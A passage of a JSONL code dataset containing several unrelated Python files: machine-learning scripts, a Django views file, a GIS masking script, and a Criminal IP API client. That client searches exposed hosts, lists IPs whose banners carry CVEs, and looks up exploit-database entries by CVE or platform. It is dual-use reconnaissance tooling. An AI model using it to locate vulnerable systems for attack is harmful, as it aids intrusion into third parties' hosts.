= np.arctan2(-v, -u) / np.pi\n print(rad)\n print(a)\n\n\n output = flow_to_image(flow) # [H, W, 3]\n\n prev = imgL\n\n cv2.imshow('flow', output)\n if cv2.waitKey(1) == ord('q'):\n break\n\ncv2.destroyAllWindows()\ncap.release()\n","repo_name":"michael-mueller-git/FunPos","sub_path":"FeatureExtraction/unimatch/test_001.py","file_name":"test_001.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"22782508947","text":"import csv\nimport cv2\nimport numpy as np\n\ndef add_relu_activation_function():\n\tmodel.add(Activation('relu'))\n\ndef add_convolutional_layer(filter, kernel_size):\n\tmodel.add(Convolution2D(filter, kernel_size, kernel_size, border_mode='valid'))\n\tadd_relu_activation_function()\n\nlines = []\nwith open('./driving_log.csv') as csvfile:\n\treader = csv.reader(csvfile)\n\tfor row in reader:\n\t\tlines.append(row)\n\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\nimport sklearn\nfrom sklearn.utils import shuffle\n\ndef generator(samples, batch_size = 64):\n\tnum_samples = len(samples)\n\tcorrection_factor = [0.0, +0.2, -0.2]\n\n\twhile 1: # Loop forever so the generator never terminates\n\t\tshuffle(samples)\n\t\tfor offset in range(0, num_samples, batch_size):\n\t\t\tbatch_samples = samples[offset:offset+batch_size]\n\t\t\t\n\t\t\timages = []\n\t\t\tmeasurments = []\n\t\t\t\n\t\t\tfor batch_sample in batch_samples:#get the 3 images for the same frame, and there corresponding readings\n\t\t\t\tfor i in range(3):\n\t\t\t\t\tsource_path = batch_sample[i]\n\t\t\t\t\tfilename = source_path.split('/')[-1]\n\t\t\t\t\tcurrent_path = './IMG/' + filename\n\t\t\t\t\timage = cv2.imread(current_path)\n\t\t\t\t\timage_flipped = np.fliplr(image)\n\t\t\t\t\timages.append(image)\n\t\t\t\t\timages.append(image_flipped)\n\t\t\t\t\tsteering = float(batch_sample[3]) + correction_factor[i]\n\t\t\t\t\tmeasurments.append(steering)\n\t\t\t\t\tmeasurment_flipped = -steering\n\t\t\t\t\tmeasurments.append(measurment_flipped)\n\n\t\t\tx_data = np.array(images)\n\t\t\ty_data = np.array(measurments)\n\t\t\tyield sklearn.utils.shuffle(x_data, y_data)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout, Lambda\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers import Cropping2D\nfrom keras.callbacks import *\n\nmodel = Sequential()\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25), (0,0))))\n\n#first convolution layer\nadd_convolutional_layer(24, 5)\nmodel.add(MaxPooling2D((2, 2)))\n\n#second convolution layer\nadd_convolutional_layer(36, 5)\n\n#third convolution layer\nadd_convolutional_layer(48, 5)\nmodel.add(MaxPooling2D((2, 2)))\n\n#forth convolution layer\nadd_convolutional_layer(64, 3)\n\n#fifth convolution layer\nadd_convolutional_layer(64, 3)\nmodel.add(MaxPooling2D((2, 2)))\n\nmodel.add(Flatten()) # flatten the model into 1 dimension.\n\n#first fully connected\nmodel.add(Dense(1164))\nadd_relu_activation_function()\n\n#second fully connected\nmodel.add(Dense(100))\nadd_relu_activation_function()\n\n#third fully connected\nmodel.add(Dense(50))\nadd_relu_activation_function()\n\n#forth fully connected\nmodel.add(Dense(10))\nadd_relu_activation_function()\n\n#last fully connected\nmodel.add(Dense(1))\n\nmodel.compile(loss = 'mse', optimizer = 'adam')\nepochs_to_wait_for_improve = 2\nearly_stopping_callback = EarlyStopping(monitor='val_loss', patience=epochs_to_wait_for_improve)\ncheckpoint_callback = ModelCheckpoint('model.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')\nmodel.fit_generator(train_generator, samples_per_epoch = len(train_samples), \n\tvalidation_data=validation_generator,\n\tnb_val_samples=len(validation_samples), nb_epoch=50, callbacks=[early_stopping_callback, checkpoint_callback])\n\nmodel.save('model.h5')\n\nimport matplotlib.pyplot as plt\n\n### print the keys contained in the history object\nprint(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n","repo_name":"ahmedmbakr/CarND-Behavioral-Cloning-P3","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4808493668","text":"# -*- coding: UTF-8 -*-\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport sys\nsys.path.append(\"..\")\nfrom common import util\n\n\nclass Discriminator(nn.Module):\n def __init__(self, obs_shape, act_shape, logger, offline_buffer, interval=15, lr=1e-4):\n super(Discriminator, self).__init__()\n self.observation_shape = obs_shape[0] + 1\n self.action_size = act_shape\n self.z = 2 * obs_shape[0] + act_shape + 1\n self.interval = interval\n self.offline_buffer = offline_buffer\n self._learning_rate = lr\n self.logger = logger\n self.model = nn.Sequential(\n nn.Linear(self.z, 100),\n nn.LeakyReLU(),\n nn.Linear(100, 1),\n nn.Sigmoid(),\n )\n self._optim = torch.optim.Adam(self.model.parameters(), lr=lr)\n self._criterion = torch.nn.BCELoss()\n self.cnt = 0\n self.to(util.device)\n self._transform_obs_action = None\n\n def forward(self, next_state) -> torch.Tensor:\n return torch.clip(self.model(next_state), 0.05, 0.95)\n\n def rollout_offline_buffer(self,\n batch_size: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"\n return: Tensor shape[batch_size, cat_vector]\n \"\"\"\n rollout_data = self.offline_buffer.sample(batch_size)\n obs = torch.Tensor(rollout_data[\"observations\"])\n act = torch.Tensor(rollout_data[\"actions\"])\n next_obs = torch.Tensor(rollout_data[\"next_observations\"])\n rew = torch.Tensor(rollout_data[\"rewards\"])\n delta_obs = next_obs - obs\n obs, act = self._transform_obs_action(obs, act)\n rollout_data = torch.cat([obs, act, delta_obs, rew], dim=1).to(util.device)\n return rollout_data\n\n def get_transform_obs_action(self, transform_obs_action):\n self._transform_obs_action = transform_obs_action\n\n def compute_loss(self,\n model_input: torch.Tensor,\n predictions: torch.Tensor,\n groundtruths: torch.Tensor\n ):\n \"\"\"\n model_input: [obs_t, act_t]\n predictions shape: [ensemble_num, batch_size, next_obs + rew]\n \"\"\"\n pre_mean, pre_var = predictions\n batch_size = model_input.shape[0]\n expert = self.rollout_offline_buffer(batch_size)\n loss_sum = torch.tensor(0.0, dtype=torch.float32).to(util.device)\n loss_gen_sum = torch.tensor(0.0, dtype=torch.float32).to(util.device)\n for i in range(pre_mean.shape[0]):\n learner = torch.cat([model_input, pre_mean[i]], dim=1).to(util.device)\n real_loss = self._criterion(self.model(expert), Variable(torch.ones(batch_size, 1).to(util.device)))\n fake_loss = self._criterion(self.model(learner.detach()), Variable(torch.zeros(batch_size, 1).to(util.device)))\n g_loss = self._criterion(self.model(learner), Variable(torch.ones(batch_size, 1).to(util.device)))\n\n # record expert and learner var\n if self.cnt % 5 == 0:\n self.logger.record(\"var/model_expert\", self.model(expert).detach().mean(), self.cnt, printed=False)\n self.logger.record(\"var/model_learner\", self.model(learner).detach().mean(), self.cnt, printed=False)\n self.cnt += 1\n\n discriminator_loss = (fake_loss.mean() + real_loss.mean()) / 2\n generate_loss = g_loss.mean()\n loss_sum += discriminator_loss\n loss_gen_sum += generate_loss\n self.logger.record(\"loss/d_loss\", loss_sum.mean(), self.cnt, printed=False)\n self.logger.record(\"loss/g_loss\", loss_gen_sum.mean(), self.cnt, printed=False)\n return loss_sum, loss_gen_sum\n\n def update(self, loss):\n self._optim.zero_grad()\n loss.backward(retain_graph=True)\n self._optim.step()\n\n @torch.no_grad()\n def compute_penalty(self,\n observations: np.ndarray,\n actions: np.ndarray,\n next_obs: np.ndarray,\n rewards: np.ndarray,\n ) -> np.ndarray:\n obs_tp1 = torch.tensor(next_obs, dtype=torch.float32).to(util.device)\n rew_tp1 = torch.tensor(np.reshape(rewards, (-1, 1)), dtype=torch.float32).to(util.device)\n rew_p = torch.cat([observations, actions, obs_tp1, rew_tp1], dim=1).to(util.device)\n d_penalty = self.forward(rew_p)\n d_penalty = 1 - d_penalty\n return d_penalty.detach().cpu().numpy()\n\n @property\n def get_interval(self):\n return self.interval\n","repo_name":"junming-yang/MOAN","sub_path":"models/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9696699972","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 30 16:44:30 2017\n\n@author: xiaomuliu\n\"\"\"\n\nimport cPickle as pickle\nimport re\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\n#import matplotlib.pyplot as plt\nfrom SetupGrid import get_cluster_mask, flattened_to_geoIm\nimport sys\nsys.path.append('..')\nfrom Misc.ComdArgParse import ParseArg\nfrom FeatureExtraction.SpatialRelation import pt_poly_membership, pt_to_nearest_geoObj\n\nargs = ParseArg()\ninfiles = args['input']\noutpath = args['output']\nparams = args['param']\n\ninfile_match = re.match('([\\w\\./]+) ([\\w\\./]+)',infiles) \nif infile_match.group(0) is not None:\n grid_pkl, district_shp = infile_match.group(1), infile_match.group(2)\nelse: \n grid_pkl = '../SharedData/SpatialData/grid.pkl'\n district_shp = '../SharedData/GISData/cpd_districts/cpd_districts.shp'\n\nfilePath_save = outpath if outpath is not None else '../SharedData/SpatialData/'\n\ncell_match = re.match('(\\d+) (\\d+)',params)\ncellsize = (int(cell_match.group(1)), int(cell_match.group(2)))\n \n# load grid info \nwith open(grid_pkl,'rb') as grid_file:\n grd_vec, grd_x, grd_y, grd_vec_inCity, mask_grdInCity, maskIm_grdInCity = pickle.load(grid_file) \n \n \ndistrict_shp ='../SharedData/GISData/cpd_districts/cpd_districts.shp' \n\nproj_str = \"+proj=tmerc +lat_0=36.66666666666666 +lon_0=-88.33333333333333 +k=0.9999749999999999 \" + \\\n \"+x_0=300000 +y_0=0 +datum=NAD83 +units=us-ft +no_defs +ellps=GRS80 +towgs84=0,0,0\" \n \nshpfile = gpd.read_file(district_shp)\nshpfile.plot()\n\ndistrict_nums = np.unique(shpfile['DISTRICT'].values)\ndistrict_nums = district_nums[district_nums!='031'] #remove district 031\n\ndistrict_label = np.zeros(len(grd_vec_inCity)).astype('str')\n#district_mask = {}\nfor dist_num in district_nums:\n isIndistrict = pt_poly_membership(grd_vec_inCity,shpfile.ix[shpfile['DISTRICT']==dist_num],proj=proj_str)['indicator']\n isIndistrict = isIndistrict.flatten()\n# district_mask[dist_num] = get_cluster_mask(mask_grdInCity,isIndistrict,True)\n\n# #visualize \n# m = flattened_to_geoIm(isIndistrict,len(grd_x),len(grd_y),mask=mask_grdInCity)\n# fig = plt.figure()\n# plt.imshow(m) \n \n district_label[isIndistrict] = dist_num\n\n# assign grid cells that do not fall in any districts to their nearest districts\nout_cells = grd_vec_inCity[district_label=='0.0']\nnearest_district_idx = pt_to_nearest_geoObj(out_cells,shpfile.ix[shpfile['DISTRICT']!='031',:])\nnearest_district = shpfile.ix[nearest_district_idx,'DISTRICT'].values\ndistrict_label[district_label=='0.0'] = nearest_district\n\ndistrict_mask = {}\nfor dist_num in district_nums: \n district_mask[dist_num] = get_cluster_mask(mask_grdInCity,district_label==dist_num,True)\n\n \nsavefile = filePath_save+'masks_district.pkl' \nwith open(savefile,'wb') as outputfile:\n pickle.dump(district_mask, outputfile, pickle.HIGHEST_PROTOCOL) \nsavefile = filePath_save+'label_district.pkl' \nwith open(savefile,'wb') as outputfile:\n pickle.dump(district_label, outputfile, pickle.HIGHEST_PROTOCOL) \n \ndistrict_label_df = pd.DataFrame(district_label) \ndistrict_label_df.to_csv(filePath_save+'label_district.csv',header=False,index=False) ","repo_name":"xiaomuliu/SpatioTemporalPredictiveModeling","sub_path":"Grid/DistrictMask.py","file_name":"DistrictMask.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"1147121301","text":"\ndef solution(numbers):\n num_to_str = list(map(str,numbers))\n # 첫번째 자리 큰거 -> 문자열 길이 긴 것부터\n result = sorted(num_to_str,key=lambda x: x*3,reverse=True)\n # for i in num_to_str:\n # print(i*3)\n # 문자열 기준 333 > 303030 더 크다\n answer = ''.join(result)\n return answer\nprint(solution([3, 30, 34, 5, 9]))\n\n# arr = [333, 332030, 34, 5, 9]\n# arr = list(map(str,arr))\n# arr = sorted(arr,reverse=True)\n# print(arr)\n","repo_name":"julia0926/TIL_Algo","sub_path":"Study/Backjoon/programmers/42746.py","file_name":"42746.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30410345398","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView, View\nfrom .models import *\nfrom django.core.mail import send_mail\n\n\n\n# Create your views here.\n\nclass HomeView(ListView):\n model = Product\n template_name = 'index.html'\n \n\ndef about(request):\n context = {}\n return render(request, 'about.html', context)\n\ndef service(request):\n context = {}\n return render(request, 'service.html', context)\n\n\nclass ProductsView(ListView):\n model = Product\n template_name = 'shop.html'\n\n\nclass ProductDetailView(DetailView):\n model = Product\n template_name = 'product-detail.html'\n\n\ndef contact(request):\n if request.method == 'POST':\n name = request.POST['name']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n message_body = f'''Hey, I am {name}.My phone number is {phone}.\n\n {message}\n '''\n # send an email \n send_mail(\n f'Message from {name} ',\n message_body,\n email,\n ['testerwebsite007@gmail.com'],\n fail_silently=False,\n )\n context = {'name':name}\n else:\n context = {}\n return render(request, 'contact.html', context)\n","repo_name":"sunanda-bag/creative-chair-website-django","sub_path":"my_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10404376934","text":"import os\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport torch\r\n\r\n\r\n\r\ndef Recode(epoch, model, dir_name, CFG, train_loss, val_loss, train_acc, val_acc, best_loss, best_acc, model_save=False):\r\n if os.path.isfile(f\"./result/{dir_name}/recode.csv\"):\r\n recode_df = pd.read_csv(f\"./result/{dir_name}/recode.csv\")\r\n \r\n recode_df = pd.DataFrame(columns=['epoch', 'train_loss', 'val_loss',\r\n 'train_acc', 'val_acc', 'best_loss',\r\n 'best_acc'])\r\n \r\n fig, axes = plt.subplots(1, 2)\r\n plt.close(fig)\r\n\r\n # Data Write\r\n os.makedirs(f\"./result/{dir_name}\", exist_ok=True)\r\n new_data = {\r\n \"epoch\": epoch,\r\n \"train_loss\": train_loss,\r\n \"val_loss\": val_loss,\r\n \"train_acc\": train_acc,\r\n \"val_acc\": val_acc,\r\n \"best_loss\": best_loss,\r\n \"best_acc\": best_acc\r\n }\r\n\r\n recode_df = recode_df.append(new_data, ignore_index=True)\r\n recode_df.to_csv(f'./result/{dir_name}/recode.csv', index=False)\r\n\r\n # Data Visualization\r\n os.makedirs(f\"./result/{dir_name}/plot\", exist_ok=True)\r\n fig, axes = plt.subplots(1, 2)\r\n fig = plt.figure(figsize=(20, 7))\r\n\r\n ax1 = fig.add_subplot(1, 2, 1)\r\n ax1.plot(recode_df['train_loss'].to_list(), label=\"train loss\")\r\n ax1.plot(recode_df['val_loss'].to_list(), label=\"val loss\")\r\n ax1.legend()\r\n\r\n ax2 = fig.add_subplot(1, 2, 2)\r\n ax2.plot(recode_df['train_acc'], label=\"train Accuracy\")\r\n ax2.plot(recode_df['val_acc'], label=\"val Accuracy\")\r\n ax2.legend()\r\n\r\n if os.path.isfile(f\"./result/{dir_name}/plot/loss_and_acc.png\"):\r\n os.remove(f\"./result/{dir_name}/plot/loss_and_acc.png\")\r\n plt.savefig(f\"./result/{dir_name}/plot/loss_and_acc.png\")\r\n\r\n # Write Hyperparameter\r\n if epoch == 1:\r\n with open(f\"./result/{dir_name}/train.txt\", 'w', encoding='UTF-8') as f:\r\n f.write(f\"{CFG}\" + \"\\n\")\r\n\r\n if model_save:\r\n torch.save(model, f\"./result/{dir_name}/model.pt\")\r\n\r\n","repo_name":"co1dtype/Dacon_Text_Recognition","sub_path":"modules/recoder.py","file_name":"recoder.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34830887137","text":"import argparse\nimport json\nimport os\nimport random\nimport requests\nimport time\nfrom pprint import pprint\nfrom config import user_agents\nfrom example_queries import queries\n\n\nHEADERS = {\n \"x-api-key\": \"\",\n \"User-Agent\": random.choice(user_agents.agents),\n}\n\n\ndef menu():\n print(\"\"\"\n1. Get API plan info\n2. Get IPs from asset banner search\n3. Get IPs with CVE from search query\n4. Check whether IPs have(s) CVE\n5. Get whois info\n6. Get domain info\n7. Find exploits\n8. Example queries\n9. Change API Key\n10. Exit\n \"\"\")\n\n\ndef get_user_api_info(x_api_key):\n url = 'https://api.criminalip.io/v1/user/me'\n data = {\n 'x-api-key': x_api_key \n }\n \n res = requests.post(url=url, headers=HEADERS)\n res = res.json()\n\n if res['status'] == 401:\n print(\"Please check your api key from .api_key file\")\n\n if res['status'] == 200:\n data = res['data']\n print(\"--------------------------------------------------\")\n print(\"account_type : {}\".format(data['account_type']))\n print(\"api_key : {}\".format(data['account_type']))\n print(\"company_name : {}\".format(data['company_name']))\n print(\"email : {}\".format(data['email']))\n print(\"last_access_date : {}\".format(data['last_access_date']))\n print(\"max_search : {}\".format(data['max_search']))\n print(\"membership_date: {}\".format(data['membership_date']))\n print(\"name : {}\".format(data['name']))\n print(\"plan_date: {}\".format(data['plan_date']))\n print(\"--------------------------------------------------\")\n\n\ndef get_ips(search_type=None, keyword=None, port=None, product=None, version=None, service=None, tag=None, tech_stack=None, offset=None):\n url = 'https://api.criminalip.io/v1/banner/search'\n params = {\n \"query\": '',\n \"offset\": 0,\n }\n\n if offset:\n params['offset'] = offset\n\n search_query = ''\n if search_type == 'by_port':\n params['query'] = '{} port: {}'.format(keyword, port)\n\n options = {'keyword': keyword, 'port': port}\n for k, v in options.items():\n if v:\n if k == 'keyword':\n search_query += '{} '.format(v)\n else:\n search_query += '{}:{} '.format(k, v)\n\n elif search_type == 'by_software':\n params['query'] = '{} product: {} product_version: {}'.format(keyword, product, version)\n search_query = params['query']\n \n elif search_type == 'by_service':\n params['query'] = '{} service: {}'.format(keyword, service)\n search_query = params['query']\n\n elif search_type == 'by_tag':\n params['query'] = '{} tag: {}'.format(keyword, tag)\n search_query = params['query']\n\n elif search_type == 'by_tech_stack':\n params['query'] = '{} tech_stack: {}'.format(keyword, tech_stack)\n search_query = params['query']\n\n ip_list = []\n res = requests.get(url=url, params=params, headers=HEADERS)\n res = res.json()\n\n if res['status'] == 200:\n for r in res['data']['result']:\n ip_list.append(r['ip_address'])\n print(r['ip_address'])\n\n print('Criminal_IP Search Query ===> {}'.format(search_query))\n\n option = input(\"Do you want to get result count? Y/N : \")\n if option == 'Y' or option == 'y':\n stats_url = 'https://api.criminalip.io/v1/banner/stats'\n res = requests.get(url=stats_url, params=params, headers=HEADERS)\n res = res.json()\n\n if res['status'] == 200:\n print(\"Result count : {}\".format(res['data']['count']))\n\n\ndef get_cve_ips(query, offset=None):\n url = 'https://api.criminalip.io/v1/banner/search'\n params = {\n \"query\": query,\n \"offset\": 0,\n }\n\n if offset:\n params['offset'] = offset\n\n ip_list = []\n res = requests.get(url=url, params=params, headers=HEADERS)\n res = res.json()\n\n if res['status'] == 200:\n for r in res['data']['result']:\n if r['has_cve']:\n ip_list.append(r['ip_address'])\n print(':'.join([r['ip_address'], str(r['open_port_no'])]))\n\n if len(ip_list) == 0:\n print(\"IPs with CVE is not found\")\n\n\ndef get_whois_data(ip):\n url = 'https://api.criminalip.io/v1/ip/data'\n params = {\n 'ip': ip\n }\n\n res = requests.get(url=url, params=params, headers=HEADERS)\n res = res.json()\n \n if res['status'] == 200:\n data = res['whois']['data'][0]\n print(\"--------------------------------------------------\")\n print('as name: {}'.format(data['as_name']))\n print('as number: {}'.format(data['as_no']))\n print('city: {}'.format(data['city']))\n print('confirmed time: {}'.format(data['confirmed_time']))\n print('latitude: {}'.format(data['latitude']))\n print('longitude: {}'.format(data['longitude']))\n print('org country code: {}'.format(data['org_country_code'].upper()))\n print('org name: {}'.format(data['org_name']))\n print('postal code: {}'.format(data['postal_code']))\n print(\"--------------------------------------------------\")\n\n\ndef get_domain_data(domain):\n url = 'https://api.criminalip.io/v1/domain/scan'\n data = {\n 'query': domain\n }\n\n res = requests.post(url=url, data=data, headers=HEADERS)\n res = res.json()\n \n scan_id = ''\n if res['status'] == 200:\n scan_id = res['data']['scan_id']\n\n print(\"Please wait for a moment... (30-40 seconds)\")\n while True:\n domain_scan_result_url = 'https://api.criminalip.io/v1/domain/report/{}'.format(scan_id)\n domain_scan_res = requests.get(url=domain_scan_result_url, headers=HEADERS)\n domain_scan_res = domain_scan_res.json()\n\n time.sleep(3)\n if domain_scan_res['status'] == 200:\n dns_record = domain_scan_res['data']['dns_record']\n\n print(\"--------------------------------------------------\")\n ipv4 = [ipv4['ip'] for ipv4 in dns_record['dns_record_type_a']['ipv4']]\n ipv6 = [ipv6['ip'] for ipv6 in dns_record['dns_record_type_a']['ipv6']]\n print('dns_record_type_a - ipv4 : {}'.format(', '.join(ipv4)))\n print('dns_record_type_a - ipv6 : {}'.format(', '.join(ipv6)))\n\n if dns_record['dns_record_type_cname']:\n print('dns_record_type_cname : {}'.format(', '.join(map(str, dns_record['dns_record_type_cname']))))\n if dns_record['dns_record_type_mx']:\n print('dns_record_type_mx : {}'.format(', '.join(map(str, dns_record['dns_record_type_mx']))))\n if dns_record['dns_record_type_ns']:\n print('dns_record_type_ns: {}'.format(', '.join(dns_record['dns_record_type_ns'])))\n if dns_record['dns_record_type_ptr']:\n print('dns_record_type_ptr : {}'.format(', '.join(dns_record['dns_record_type_ptr'])))\n if dns_record['dns_record_type_soa']:\n print('dns_record_type_soa : {}'.format(', '.join(dns_record['dns_record_type_soa'])))\n print(\"--------------------------------------------------\")\n\n break\n\n\ndef find_exploits(search_type=None, cve_id=None, author=None, edb_id=None, platform=None, exploit_type=None, keyword=None, offset=None):\n url = 'https://api.criminalip.io/v1/exploit/search'\n params = {\n 'query': '',\n 'offset': 0\n }\n\n if offset:\n params['offset'] = offset\n\n if search_type == 'by_cve_id':\n params['query'] = 'cve_id: {}'.format(cve_id)\n elif search_type == 'by_author':\n params['query'] = 'author: {}'.format(author)\n elif search_type == 'by_edb_id':\n params['query'] = 'edb_id: {}'.format(edb_id)\n elif search_type == 'by_platform':\n params['query'] = 'platform: {}'.format(platform)\n elif search_type == 'by_ exploit_type':\n params['query'] = 'type: {}'.format(exploit_type)\n elif search_type == 'by_keyword':\n params['query'] = '{}'.format(keyword)\n\n res = requests.get(url=url, params=params, headers=HEADERS)\n res = res.json()\n\n if res['status'] == 200:\n for i, r in enumerate(res['data']['result']):\n print(\"--------------------------------------------------\")\n print(\"{} / {}\".format(i+1, len(res['data']['result'])))\n print(\"author : {}\".format(r['author']))\n print(\"edb id : {}\".format(r['edb_id']))\n print(\"edb registration date : {}\".format(r['edb_reg_date']))\n print(\"platform : {}\".format(r['platform']))\n print(\"title : {}\".format(r['title']))\n print(\"type : {}\".format(r['type']))\n\n option = input(\"Do you want to get result count? Y/N : \")\n if option == 'Y' or option == 'y':\n stats_url = 'https://api.criminalip.io/v1/exploit/search'\n res = requests.get(url=stats_url, params=params, headers=HEADERS)\n res = res.json()\n\n if res['status'] == 200:\n print(\"Result count : {}\".format(res['data']['count']))\n\n\ndef change_api_key(api_key):\n with open('.api_key', 'w') as file:\n file.write(api_key)\n file.close()\n\n print(\"Successfully updated your criminal_ip api key\")\n\n\ndef main():\n if os.path.exists('.api_key'):\n with open('.api_key', 'r') as file:\n api_key = file.readline().strip()\n else:\n api_key = input(\"Enter Criminal_IP API KEY : \")\n with open('.api_key', 'w') as file:\n file.write(api_key)\n file.close()\n\n global HEADERS\n HEADERS['x-api-key'] = api_key\n \n while True:\n menu()\n\n selected_num = int(input(\"Enter Selection: \"))\n\n if selected_num == 1:\n get_user_api_info(HEADERS['x-api-key'])\n\n elif selected_num == 2:\n while True:\n print(\"\"\"\n1. Get IPs by port\n2. Get IPs by software product/version\n3. Get IPs by service\n4. Get IPs by tag\n5. Get IPs by tech_stack\n6. Return to main menu\n\"\"\")\n\n option = int(input(\"Enter Selection: \"))\n if option == 1:\n keyword = input(\"Enter keyword(optional): \")\n port = input(\"Enter port: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_port\", keyword=keyword, port=port, offset=offset)\n\n elif option == 2:\n keyword = input(\"Enter keyword(optional): \")\n product = input(\"Enter product name: \")\n version = input(\"Enter product version(optional): \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_software\", keyword=keyword, product=product, version=version, offset=offset)\n\n elif option == 3:\n keyword = input(\"Enter keyword(optional): \")\n service = input(\"Enter service name: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_service\", keyword=keyword, service=service, offset=offset)\n\n elif option == 4:\n keyword = input(\"Enter keyword(optional): \")\n tag = input(\"Enter tag (ex: https): \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_tag\", keyword=keyword, tag=tag, offset=offset)\n\n elif option == 5:\n keyword = input(\"Enter keyword(optional): \")\n tech_stack = input(\"Enter tech stack (ex: jQuery): \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n get_ips(search_type=\"by_tech_stack\", keyword=keyword, tech_stack=tech_stack, offset=offset)\n\n elif option == 6:\n break\n\n elif selected_num == 3:\n query = input(\"Enter search query: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n if not query:\n print(\"Search query is necessary\")\n break\n\n get_cve_ips(query=query, offset=offset)\n\n elif selected_num == 4:\n ip = input(\"Enter IP or IP/CIDR: \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n if not ip:\n print(\"IP is necessary\")\n break\n\n query = 'ip: {}'.format(ip)\n get_cve_ips(query=query, offset=offset)\n\n elif selected_num == 5:\n ip = input(\"Enter IP : \")\n\n get_whois_data(ip=ip)\n \n elif selected_num == 6:\n domain = input(\"Enter domain: \")\n\n get_domain_data(domain=domain)\n\n elif selected_num == 7:\n while True:\n print(\"\"\"\n1. Get exploits by cve_id \n2. Get exploits by author \n3. Get exploits by edb_id\n4. Get exploits by platform \n5. Get exploits by type \n6. Get exploits by keyword\n7. Return to main menu\n\"\"\")\n\n option = int(input(\"Enter Selection: \"))\n if option == 1:\n cve_id = input(\"Enter CVE_ID : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_cve_id\", cve_id=cve_id, offset=offset)\n\n elif option == 2:\n author = input(\"Enter author : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_author\", author=author, offset=offset)\n\n elif option == 3:\n edb_id = input(\"Enter edb id : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_edb_id\", edb_id=edb_id, offset=offset)\n\n elif option == 4:\n platform = input(\"Enter platform : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_platform\", platform=platform, offset=offset)\n\n elif option == 5:\n exploit_type = input(\"Enter exploit type : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_exploit_type\", exploit_type=exploit_type, offset=offset)\n\n elif option == 6:\n keyword = input(\"Enter keyword : \")\n offset = input(\"Enter start position(from 0 to 9,900 by 100): \")\n find_exploits(search_type=\"by_keyword\", keyword=keyword, offset=offset)\n\n elif option == 7:\n break\n\n elif selected_num == 8:\n print(\"Example queries are below :\")\n\n i = 0\n for k, v in queries.items():\n i += 1\n print('{} : {}'.format(i, v))\n \n elif selected_num == 9:\n api_key = input(\"Enter Criminal_IP API KEY : \")\n change_api_key(api_key)\n\n elif selected_num == 10:\n exit(\"Exit\")\n\n else:\n print(\"Selected invalid number, please select again\")\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Jaxon1111/aegis_with_jarvis","sub_path":"aegis_with_jarvis.py","file_name":"aegis_with_jarvis.py","file_ext":"py","file_size_in_byte":15336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8088658320","text":"try:\n import PyQt5.QtWidgets as QtGui\n import PyQt5.QtGui as QtGui2\n from PyQt5 import QtCore\nexcept:\n from PyQt4 import QtCore, QtGui\nimport os, platform\nfrom datetime import datetime\nfrom functools import partial\nfrom time import sleep\nimport sys\nclass Dialog(QtGui.QDialog):\n def __init__(self, inp, ctrl_library):\n QtGui.QDialog.__init__(self)\n self.ctrl_library = ctrl_library\n self.setWindowTitle(\"DynaGUI Alarms\")\n if inp == 0:\n loadflag = 0\n else:\n try:\n self.loadfile(inp,1)\n 